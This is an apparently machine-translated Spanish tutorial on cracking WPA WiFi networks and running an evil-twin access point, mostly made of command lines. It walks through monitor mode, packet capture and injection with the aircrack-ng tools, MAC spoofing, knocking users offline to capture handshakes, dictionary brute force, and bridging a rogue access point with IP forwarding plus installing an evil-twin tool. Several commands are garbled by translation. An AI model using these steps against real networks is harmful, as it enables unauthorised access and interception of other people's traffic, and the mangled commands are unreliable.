5. Penetración inalámbrica wpa wifi crack
Nombre memorable para los humanos (nombre de wifi)
Dirección mac de la aplicación inalámbrica Bss
Para descifrar WiFi, consulte a continuación para descifrar wpa
iwconfig
iw list
iw dev wlan0mon set canal 4 Cambiar el canal a 4
iwlist wlan0mon canal Ver el canal donde se encuentra wlan0mon y el canal al que ser capturado Los canales están en el mismo canal
iw dev wlan0 scan | grep SSID escanea ap cercano (WiFi)
iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID " puede filtrar En el canal base
iw dev wlan0 interface add wlan0mon type monitor Agregue una interfaz de tarjeta de red que pueda ser monitoreada. Tenga en cuenta que wlan0 es su propia tarjeta de red inalámbrica. Puede verificarlo con iwconfig. Puede ser wlan1 o wlan2. Puede verlo en iwconfig más adelante (si no lo ve, intente cerrar el servicio de detención del administrador de red) y luego use ifconfig wlan0mon para iniciarlo. para capturar paquetes
iw dev wlan0mon interface del eliminar la interfaz de tarjeta de red agregada
service network-manager stop Primero, cierre el servicio
airmon-ng check puede verificar los procesos que pueden entrar en conflicto
airmon-ng check kill puede eliminar todos los procesos en conflicto
airmon-ng start wlan0 6. Comience a escuchar en wlan0. para comenzar a escuchar, no es necesario escribirlo. No hay diferencia con el comando iw anterior.
iwlist wlan0mon channel Ver ¿En qué canal está actualmente?
Airmon. -ng stop wlan0mon desactiva el monitoreo y luego usa ifconfig wlan0 up para iniciar la tarjeta de red inalámbrica y luego usa el servicio network-manager start para iniciar el servicio para uso normal
airodump-ng wlan0mon package capture captura paquetes de todos los canales por defecto airodump-ng wlan0 -c 1 El número 1 representa la captura de paquetes del canal 1
airodump-ng wlan0mon -c 1 --bssid 00:11 :22:33:44:55 -w nombre de archivo.cap --ivs Se puede omitir cada uno de los siguientes: bssid significa capturar solo los paquetes de este ap -w nombre de archivo puede guardar los paquetes capturados como un archivo- -ivs significa capturar solo paquetes cifrados WEP
Al inyectar paquetes, asegúrese de colocarse a usted y al destino en el mismo canal
Si desea falsificar la dirección de origen al enviar un paquete, puede usar macchanger -m 00:11:2
2:33:44:55 wlan0mon cambia su dirección mac para que sea la misma que la dirección que se va a falsificar
aireplay-ng -9 prueba de inyección de paquetes wlan0mon Si la prueba de inyección de paquetes no tiene éxito, puede ejecutarla. ifconfig wlan0mon listo para probar
En este momento, habrá dos dispositivos con el mismo mac en la red y habrá pérdida de paquetes
Si el WiFi solo usa filtrado de direcciones mac y sin contraseña, puedes conectarte. Puedes usar la contraseña de WiFi descifrada. Utiliza una contraseña de WiFi descifrada y una dirección mac para forjar una conexión a un WiFi con una contraseña y un enlace de mac.
Es relativamente simple y puede. puede descifrarse por completo siempre que capture suficientes paquetes
Ideas de craqueo por fuerza bruta
Capturar el paquete de protocolo de enlace de un usuario
Si un usuario ya está conectado, puede desconéctese y vuelva a conectarse para obtener el paquete de protocolo de enlace (no espere a que otros se conecten) p>
Luego, coloque una gran cantidad de diccionarios de contraseñas en el paquete de protocolo de enlace y calcule para ver si es la contraseña correcta. se ejecutará mucho más rápido si usa una tarjeta gráfica. También puede ir a Taobao para buscar a alguien que ejecute el paquete.
Encienda un punto de acceso wifi
Después de usar el comando anterior, podrá. Puede usar ifconfig -a para ver que hay una tarjeta de red adicional llamada at0. El siguiente paso es conectar at0 y eth0 (es decir, la tarjeta de red conectada a la red externa. Si está usando WiFi, wlan0 y similares). para unirlos
apt-get install bridge-utils bridge network card toolkit
Las interfaces miembro de la interfaz del puente son eth0 y at0. No pueden tener direcciones IP, por lo que se utilizan. por separado
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
Para iniciar estas dos interfaces, la dirección IP es 0.0.0.0
p>Usar de nuevo
ifconfig bridge 192.168.1.10 up
Asigne a la tarjeta de red del puente creada anteriormente una dirección IP y ábrala. Esta dirección IP utiliza la dirección IP de. eth0 arriba
El propósito de agregar una puerta de enlace es permitir a los usuarios conectados al WiFi habilitado por piratas informáticos obtener directamente la dirección IP de la ruta real
netstat -nr
route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1
Iniciar reenvío de IP
echo 1 gt /proc/sys/net/ipv4/ip_forward
cat /proc/sys /net/ipv4/ip_forward Confirmar que la modificación se ha completado
git clone /P0cL4bs/3vilTwinAttacker.git
cd 3vilTwinAttacker
chmod x installer.sh
./installer.sh --install
La instalación se realizó correctamente
Utilice la herramienta de inicio
wifi-pumpkin no es el 3vilTwinAttacker anterior. Vea la instalación final. Las palabras rojas en la línea de comando ejecutan este comando en la terminal.